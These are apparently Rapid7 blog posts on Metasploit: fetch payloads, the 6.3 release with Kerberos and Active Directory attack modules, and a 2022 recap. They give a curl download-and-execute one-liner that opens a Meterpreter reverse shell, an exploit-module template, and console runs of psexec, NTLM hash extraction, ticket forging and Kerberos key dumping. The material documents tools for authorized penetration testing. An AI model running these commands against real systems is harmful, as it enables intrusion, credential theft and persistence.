   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      NdqujpmEtq       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

View the full module info with the info, or info -d command.

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
LHOST => 10.5.135.201

That’s it—no more setup unless you want to customize further. You can see that there are other options: FETCH_DELETE will attempt to delete the file after it executes, and the options FETCH_WRITABLE_DIR and FETCH_FILENAME will tell the fetch payload where to store the file on the remote host (in case there is a safe directory elsewhere that evades logging or antivirus. Users can also change the FETCH_URI value where the underlying payload is served, but the value is automatically generated based on the underlying payload: If a user creates a fetch payload in msfvenom and a listener in Framework, the default FETCH_URI values will match if the underlying payload is the same. Now, just like any payload, we can call generate or use msfvenom to create the command we need to execute on the remote host:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw

[*] Command to run on remote host: curl -so %TEMP%\NdqujpmEtq.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\NdqujpmEtq.exe
curl -so %TEMP%\NdqujpmEtq.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\NdqujpmEtq.exe

Also, the command appears when you start the handler:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler

[*] Command to run on remote host: curl -so %TEMP%\KphvDFGglOzp.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\KphvDFGglOzp.exe
[*] Payload Handler Started as Job 0
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) >

For fetch payloads, to_handler does several things:

  • Creates the underlying payload in an executable format based on the platform selected; since we’re using Windows, the payload is created as an exe file.
  • Starts a server based on the protocol for the specific fetch payload selected
  • Adds the executable payload to the server
  • Creates a one-liner to download and execute the payload on target

All the user needs to do is copy/paste the command and hit enter:

C:\Users\msfuser\Downloads>curl -so %TEMP%\KphvDFGglOzp.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\KphvDFGglOzp.exe

That will use cURL to download the payload and execute it:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 
[*] Client 10.5.134.167 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.134.167 (curl/7.55.1)
[*] Sending stage (200774 bytes) to 10.5.134.167
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:64681) at 2023-05-18 12:39:12 -0500
sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-D1E425Q\msfuser @ DESKTOP-D1E425Q  10.5.135.201:4444 -> 10.5.134.167:64681 (10.5.134.1
                                                                                67)

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 

Using Fetch Payloads in a Metasploit Module

Module authors probably already see the utility in command injection modules. Framework’s command stagers are very powerful, but they also present a non-trivial barrier to entry for the user. Using fetch payloads in a Metasploit module is straightforward; authors will need to set the platform as linux or win and add the arch as ARCH_CMD. Then, when it comes time to get the command that must run on the remote target, simply invoke payload.encoded. Below is a bare-bones template of a module using fetch payloads against a Linux web server with a command injection vulnerability:

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Module Name',
        'Description' => %q{ 1337 },
        'License' => MSF_LICENSE,
        'Author' => [ 'you' ],
        'References' => [],
        'Platform' => 'linux',
        'Arch' => 'ARCH_CMD',
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
          'RPORT' => 80,
          'FETCH_COMMAND' => 'WGET'
        },
        'Targets' => [ [ 'Default', {} ] ],
        'DisclosureDate' => '2022-01-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )
    register_options(
      [
        Msf::OptString.new('TARGET_URI', [ false, 'URI', '/hackme'])
      ]
    )
  end

  def execute_command(cmd)
    # Whatever it takes to execute a cmd on target
  end

  def check
    # Put your check method here
  end

  def exploit
    execute_command(payload.encoded)
  end
end

That’s it. With fetch payloads, Metasploit Framework will set up the server, make the executable payload, start the payload handler, serve the payload, handle the callback, and provide the command that needs to be executed; all you’ve got to do is tell it how to execute a command and then write a check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Framework 6.3 Released

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/01/30/metasploit-framework-6-3-released/

Metasploit Framework 6.3 Released

The Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.

Background

Kerberos is an authentication protocol that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it’s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.

Kerberos and Active Directory more broadly have been prime attack targets for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a technical whitepaper on a slew of novel attack techniques targeting Active Directory Certificate Services (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.

More than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.

New in Metasploit 6.3

Metasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.

Highlights include:

  • Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM
  • The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS
  • Kerberos ticket inspection and debugging via the auxiliary/admin/kerberos/inspect_ticket module and the auxiliary/admin/kerberos/keytab module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark
  • Fully automated privilege escalation via Certifried (CVE-2022–26923)

See a graph of Metasploit authentication methods here.

MSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. AD DS modules include:

In recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:

Additional features and improvements since Metasploit 6.2 include:

  • A sixth getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM ("EfsPotato")
  • Better Linux credential extraction through native Mimipenguin support in Metasploit
  • Meterpreter support for running Cobalt Strike’s Beacon Object Files (BOF) — many thanks to the TrustedSec team!
  • A rewrite of Metasploit’s datastore to resolve common errors, address edge cases, and improve user quality of life
  • Updated show options support that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)

Example workflows

Below are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the Metasploit docs site. This documentation is open-source, and contributions are welcome.

Kerberos Service Authentication

Opening a WinRM session:

msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 1...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>

Querying LDAP for accounts:

msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 pwdlastset          133184302034979121
 samaccountname      Administrator
 useraccountcontrol  512
 ... etc ...

Running PsExec against a host:

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000

meterpreter >

Connecting to a Microsoft SQL Server instance and running a query:

msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssql::domain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)

 auth_scheme
 -----------
 KERBEROS

[*] Auxiliary module execution completed

Kerberos klist support

When running Metasploit with a database, all Kerberos tickets will be persisted into the database. The klist command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:

msf6 > klist
Kerberos Cache
==============
host            principal               sname                              issued                     status       path
----            ---------               -----                              ------                     ------       ----
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin
192.168.159.10  [email protected]  cifs/[email protected]  2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-16 14:51:50 -0500  valid        /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin
192.168.159.10  [email protected]  cifs/[email protected]  2022-12-16 17:07:48 -0500  valid        /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin
192.168.159.10  [email protected]  cifs/[email protected]               2022-12-16 17:08:26 -0500  valid        /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-16 15:03:03 -0500  valid        /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin
192.168.159.10  [email protected]    krbtgt/[email protected]   2022-12-16 15:25:16 -0500  valid        /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin

The klist command also supports the -v flag for showing additional detail.

Requesting tickets

The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. For instance the following example will request a TGS impersonating the Administrator account:

msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24

[*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local)
[+] 10.0.0.24:88 - Received a valid TGT-Response
[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] 10.0.0.24:88 - Received a valid TGS-Response
[+] 10.0.0.24:88 - Received a valid TGS-Response
[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed

The auxiliary/admin/kerberos/get_ticket module also supports authentication via PKINIT with the CERT_FILE and CERT_PASSWORD options. When used with the GET_HASH action, a user-to-user (U2U) authentication TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.

msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx
[*] Running module against 192.168.159.10

[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin
[*] 192.168.159.10:88 - Getting NTLM hash for [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) >

Forging tickets

After compromising a KDC or service account, users can forge Kerberos tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:

msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local

[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
[*] Auxiliary module execution completed

Kerberos debugging support

Metasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.

The new auxiliary/admin/kerberos/inspect_ticket module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the auxiliary/gather/windows_secrets_dump module or similar:

msf6 > use auxiliary/admin/kerberos/inspect_ticket
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: [email protected]
Ccache version: 4

Creds: 1
  Credential[0]:
    Server: cifs/[email protected]
    Client: [email protected]
    Ticket etype: 18 (AES256)
    Key: 3436643936633032656264663030393931323461366635653364393932613763
    Ticket Length: 978
    Subkey: false
    Addresses: 0
    Authdatas: 0
    Times:
      Auth time: 2022-11-21 13:52:00 +0000
      Start time: 2022-11-21 13:52:00 +0000
      End time: 2032-11-18 13:52:00 +0000
      Renew Till: 2032-11-18 13:52:00 +0000
    Ticket:
      Ticket Version Number: 5
      Realm: WINDOMAIN.LOCAL
      Server Name: cifs/dc.windomain.local
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 2
        Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
          Times:
            Auth time: 2022-11-21 13:52:00 UTC
            Start time: 2022-11-21 13:52:00 UTC
            End time: 2032-11-18 13:52:00 UTC
            Renew Till: 2032-11-18 13:52:00 UTC
          Client Addresses: 0
          Transited: tr_type: 0, Contents: ""
          Client Name: 'Administrator'
          Client Realm: 'WINDOMAIN.LOCAL'
          Ticket etype: 18 (AES256)
          Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
          Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
          PAC:
            Validation Info:
              Logon Time: 2022-11-21 13:52:00 +0000
              Logoff Time: Never Expires (inf)
              Kick Off Time: Never Expires (inf)
              Password Last Set: No Time Set (0)
              Password Can Change: No Time Set (0)
              Password Must Change: Never Expires (inf)
              Logon Count: 0
              Bad Password Count: 0
              User ID: 500
              Primary Group ID: 513
              User Flags: 0
              User Session Key: 00000000000000000000000000000000
              User Account Control: 528
              Sub Auth Status: 0
              Last Successful Interactive Logon: No Time Set (0)
              Last Failed Interactive Logon: No Time Set (0)
              Failed Interactive Logon Count: 0
              SID Count: 0
              Resource Group Count: 0
              Group Count: 5
              Group IDs:
                Relative ID: 513, Attributes: 7
                Relative ID: 512, Attributes: 7
                Relative ID: 520, Attributes: 7
                Relative ID: 518, Attributes: 7
                Relative ID: 519, Attributes: 7
              Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
              Effective Name: 'Administrator'
              Full Name: ''
              Logon Script: ''
              Profile Path: ''
              Home Directory: ''
              Home Directory Drive: ''
              Logon Server: ''
              Logon Domain Name: 'WINDOMAIN.LOCAL'
            Client Info:
              Name: 'Administrator'
              Client ID: 2022-11-21 13:52:00 +0000
            Pac Server Checksum:
              Signature: 04e5ab061c7a909a26b122c2
            Pac Privilege Server Checksum:
              Signature: 710bb183858257f41021bd7e

Metasploit has also added first-class support for the Keytab file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.

For instance, if Metasploit’s database is configured when running the secretsdump module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit’s database:

# Secrets dump
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
... ommitted ...
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
Administrator:des-cbc-md5:ad49d9d92f5da170
Administrator:des-cbc-crc:ad49d9d92f5da170
krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
... ommitted ...
[*] Auxiliary module execution completed

These Kerberos encryption keys can then be exported to a new Keytab file with the admin/kerberos/keytab module:

# Export to keytab
msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab
msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab
[+] keytab saved to ./example.keytab
Keytab entries
==============

 kvno  type              principal                                   hash                                                              date
 ----  ----              ---------                                   ----                                                              ----
 1     1  (DES_CBC_CRC)  [email protected]                       3e5d83fe4594f261                                                  1970-01-01 01:00:00 +0100
 1     17 (AES128)       ADF3\[email protected]                        967ccd1ffb9bff7900464b6ea383ee5b                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  ADF3\[email protected]                        62336164643537303830373630643133                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       [email protected]                    56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
 1     17 (AES128)       [email protected]                    df990c21c4e8ea502efbbca3aae435ea                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  [email protected]                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     1  (DES_CBC_CRC)  [email protected]                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       [email protected]                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
 1     17 (AES128)       [email protected]                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  [email protected]                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
... ommitted ...
[*] Auxiliary module execution completed

Once the new Keytab file is created, modify Wireshark to use the exported encryption keys in Edit -> Preferences -> Protocols -> KRB5, and select try to decrypt Kerberos blobs. Now Wireshark will automatically try to decrypt Kerberos blobs — the blue highlighted lines show Wireshark’s decryption working:

Metasploit Framework 6.3 Released

Certifried privilege escalation

Metasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried (CVE-2022–26923) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.

Updated show options support

Previous to Metasploit 6.3 the show options and show advanced commands would display a module’s supported options in a single list.

Now module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting to them to the user:

Metasploit Framework 6.3 Released

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.

2022 Annual Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/12/30/2022-metasploit-wrap-up/

2022 Annual Metasploit Wrap-Up

It’s been another gangbusters year for Metasploit, and the holidays are a time to give thanks to all the people that help make our load a little bit lighter. So, while this end-of-year wrap-up is a highlight reel of the headline features and extensions that landed in Metasploit-land in 2022, we also want to express our gratitude and appreciation for our stellar community of contributors, maintainers, and users. The Metasploit team merged 824 pull requests across Metasploit-related projects in 2022, more than 650 of which were incorporated into the main metasploit-framework repository. If you fixed a typo, linked a new reference, or cleaned up some code spaghetti, thank you!

Active Directory Certificate Services attacks

For years now, penetration testers and attackers have emphasized Active Directory as a particularly juicy and valuable attack surface area. In 2021, we saw fresh attack research that outlined new techniques for targeting Active Directory Certificate Services, or AD CS, including multiple configuration flaws that can be leveraged to escalate permissions from a domain user to a privileged account. In response to requests from our user community, Metasploit released two modules in the second half of 2022 that support AD CS attack techniques:

  • auxiliary/gather/ldap_esc_vulnerable_cert_finder can be used by an authenticated AD user to enumerate Certificate Authorities (CAs) and find vulnerable certificate templates.
  • auxiliary/admin/dcerpc/icpr_cert allows users to issue certificates from AD CS with a few options that are used for exploiting some escalation (ESC) scenarios. Currently only escalation technique 1 (ESC1) can be exploited with the available options, but support for more techniques is planned.

Linux credential extraction with Mimipenguin

Metasploit expanded our post-exploitation capabilities for extracting plaintext credentials on Linux systems by porting the Mimipenguin utility to Metasploit. This allows users to extract credentials for a variety of services from an established Meterpreter session, including the gnome-keyring-daemon, vsftpd and sshd. Under the hood, this functionality uses a new Meterpreter API that allows searching through process memory.

Metasploit plays well with others

This year Metasploit added a few different ways of supporting interoperability with other offensive security tools. First up is the BOF Loader for COFF files, which enables usage of Cobalt Strike’s Beacon Object File format from within the Windows Meterpreter. This extension can also use BOF files written for Sliver. We’ve also made an improvement this year to allow users to bring their own payloads and stages from other tools and formats. If you’re a Sliver user, you can now deploy a Sliver agent as a custom payload stage, and we will use our own Metasploit stagers to upload and run the custom shellcode on the target.

Holiday hacking challenge

Metasploit teamed up with TryHackMe to deliver a challenge as part of their Advent of Cyber event, which ran for the month of December. The Metasploit challenge debuted on December 9 and walked users through a fun Christmas-themed story where they were able to use some of Metasploit’s latest pivoting capabilities. A walk-through is available under Task 9 on the official event page.

Sixth getsystem technique

Metasploit added a new technique to everyone’s favorite Meterpreter command in the middle of 2022 with help from cdelafuente-r7, who incorporated the newest named-pipe impersonation-based technique (the EfsPotato variant). This particular vulnerability affects Windows Vista / Server 2008 and later can be executed entirely in memory to escalate the current session to NT AUTHORITY\SYSTEM without spawning a new process. For more information about this and other getsystem techniques, check out the new module documentation. (Pro tip: Specific techniques can be used by number!)

Post API improvements and maintenance

Community member bcoles made more than 100 pull requests to improve and maintain the post-exploitation API used by Metasploit’s 400+ post modules. This enormous effort is greatly appreciated and has fixed numerous bugs, added new functionality, and made general improvements that benefit both end users and module developers alike. Among those improvements are removing quite a few lingering Meterpreter scripts (which were replaced by post modules in 2011) and adding shell session support for a few enumeration modules. The shell session support is particularly useful when combined with 2021’s payload-less session improvements because it bypasses the need to address evasion with Meterpreter.

New contributors

We would like to thank the community for all the work done this year. Particularly, we want to give a big shout out to the 45 new contributors that added great content to Metasploit. Some of these folks even added modules for celebrity vulnerabilities or flaws that were being actively exploited in the wild, such as Apache Spark RCE (CVE-2022-33891), Spring Cloud Gateway RCE (CVE-2022-22947) or Spring Framework RCE (CVE-2022-22965). We’re grateful to all our contributors for submitting modules that help organizations test their defenses, demonstrate risk, and prioritize mitigations.

New contributor # of modules
h00die-gr3y 5
krastanoel 4
npm-cesium137-io 4
Ayantaker 1
PazFi 1
c0rs 1
giacomo270197 1
jerrelgordon 1
m4lwhere 1
mauricelambert 1
rad10 1
talhakarakumru 1
usiegl00 1
vleminator 1

Others contributed to make Metasploit even better with enhancements, fixes and documentation:

New contributors
3V3RYONE
AtmegaBuzz
EmilioPanti
ILightThings
Invoke-Mimikatz
NikitaKovaljov
ORelio
Ronni3X
VanSnitza
